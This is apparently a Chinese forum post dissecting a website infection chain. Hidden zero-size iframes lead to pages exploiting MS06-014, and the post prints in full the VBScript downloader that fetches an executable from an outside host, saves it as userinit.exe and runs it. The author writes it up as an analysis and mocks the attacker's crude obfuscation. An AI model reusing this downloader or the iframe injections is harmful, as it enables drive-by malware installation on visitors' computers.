至于想知道http://www.hdsdbook.com.cn/1.htm内里有什么乾坤:
代码上方有一段:
<iframe src=http://www.hdsdbook.com.cn/setup/help.htm width=0 height=0></iframe>
help.htm又有一段:
<iframe src=http://www.wzxqy.com/11/index.htm width=0 height=0></iframe>
index.htm里有一段:
<iframe src=http://www.wzxqy.com/2/index.asp width=0 height=0></iframe>
index.asp,加了N多无用的空格(低劣幼稚的方法)
实际内容中有:
<frame src="01.asp" frameborder="no" scrolling="no" noresize marginwidth="0" marging height="0">
<frame src="02.asp" frameborder="no" scrolling="no" noresize marginwidth="0" marging height="0">
http://www.wzxqy.com/2/01.asp和http://www.wzxqy.com/2/02.asp还是加了N多空格(又一次幼稚的做法)
实际内容,忒无聊,利用MS06-014漏洞,下载http://www.wzxqy.com/2/mm.exe到临时文件夹命名为userinit.exe(01.asp把它命名为这个)或fobnn.exe(02.asp的命名)并执行。
还发现了有趣的东西,01.asp的代码实质上是:
<html>
<script language="VBScript">
on error resume next
QQ112807930="http://www.wzxqy.com/2/mm.exe"
Set df = document.createElement("
object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.Create
Object(str,"")
a1="Adodb."
a4="Stream"
str1=a1&a4
str5=str1
set S = df.create
object(str5,"")
S.type = 1
str6="GET"
x.Open str6, QQ112807930, False
x.Send
fname1="userinit.exe"
set F = df.create
object("Scripting.FileSystem
Object","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.create
object("Shell.Application","")
Q.ShellExecute fname1,"",""
</script>
</html>
一个连QQ都敢放上代码,却只做了加空格和乱码这么幼稚的处理就挂上去的人,也太傻了点吧?!